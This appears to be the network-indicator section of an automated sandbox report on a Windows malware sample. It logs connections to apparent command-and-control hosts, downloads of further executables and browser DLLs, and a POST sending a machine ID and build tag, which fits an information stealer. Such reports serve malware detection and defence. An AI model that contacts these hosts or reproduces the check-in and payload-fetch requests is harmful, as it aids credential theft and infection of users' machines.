Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002D29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 15_2_002D29BA
Source: global traffic HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.176Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/sqlite3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/freebl3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/mozglue.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/msvcp140.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/nss3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/softokn3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/vcruntime140.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /seed.exe HTTP/1.1Host: 176.113.115.37Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: tjKhgPhoLOjoHpkZoehqyy.tjKhgPhoLOjoHpkZoehqyy
Source: global traffic DNS traffic detected: DNS query: post-to-me.com
Source: unknown HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: 62.204.41.176Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 39 35 36 36 34 45 39 41 30 39 32 36 35 33 37 36 34 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 37 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="hwid"A995664E9A092653764225------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="build"default7_cap------ECBAEBGHDAECBGDGCAKE--
Source: Blank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/
Source: Blank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000F.00000002.3346669929.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
Source: Blank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe#j
Source: Blank.pif, 0000000F.00000002.3346669929.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe%5
Source: Blank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeP
Source: Blank.pif, 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWARE
Source: Blank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exerypt.dllemp
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000003.3325557264.0000000033BDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/seed.exe
Source: 1248.tmp.exe, 00000010.00000002.3373004231.0000000033BE7000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000003.3325557264.0000000033BDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.37/seed.exeO
Source: 1248.tmp.exe, 00000010.00000002.3346073741.00000000005CB000.00000040.00000001.01000000.0000000A.sdmp, 1248.tmp.exe, 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/freebl3.dll
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/freebl3.dllX
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/mozglue.dll
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/mozglue.dll:
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/msvcp140.dll
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/msvcp140.dllJ
Source: 1248.tmp.exe, 00000010.00000002.3347473837.0000000000709000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/nss3.dll
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/softokn3.dll
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/softokn3.dllr
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/sqlite3.dll
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/vcruntime140.dll
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/db293a2c1b1c70c4/vcruntime140.dll;
Source: 1248.tmp.exe, 00000010.00000002.3366616098.0000000026FAA000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/edd20096ecef326d.php
Source: 1248.tmp.exe, 00000010.00000002.3366616098.0000000026FBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/edd20096ecef326d.php#g
Source: 1248.tmp.exe, 00000010.00000002.3346073741.00000000005CB000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: http://62.204.41.176/edd20096ecef326d.phpCGIDAAAKJJ.exea;
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/edd20096ecef326d.phpE
Source: 1248.tmp.exe, 00000010.00000002.3366616098.0000000026FAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/edd20096ecef326d.phpY
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.176/edd20096ecef326d.phpa
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: hlyG1m5UmO.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: hlyG1m5UmO.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: hlyG1m5UmO.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: hlyG1m5UmO.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://ocsp.digicert.com0
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, hlyG1m5UmO.exe, 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Amcache.hve.19.dr String found in binary or memory: http://upx.sf.net
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000B.00000000.2148373392.0000000000329000.00000002.00000001.01000000.00000008.sdmp, Blank.pif, 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 1248.tmp.exe, 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 1248.tmp.exe, 00000010.00000002.3373295475.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: LocalCGIDAAAKJJ.exe, 0000002B.00000000.3327544133.0000000000812000.00000002.00000001.01000000.0000000E.sdmp, seed[1].exe.16.dr, LocalCGIDAAAKJJ.exe.16.dr String found in binary or memory: https://api.ipify.orggSOFTWARE
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FCAFIJJJKEGIECAKKEHI.16.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: https://mozilla.org0/
Source: Blank.pif, 0000000F.00000002.3346669929.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://post-to-me.com/
Source: Blank.pif String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: Blank.pif, 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DEvector
Source: Blank.pif, 0000000F.00000002.3346669929.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://support.mozilla.org
Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: Blank.pif.2.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://www.mozilla.org
Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 1248.tmp.exe, 00000010.00000003.3192130266.000000002D013000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
